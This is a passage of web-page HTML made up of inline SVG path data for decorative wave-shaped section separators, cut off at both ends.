d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n </svg>\n </div>\n <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path 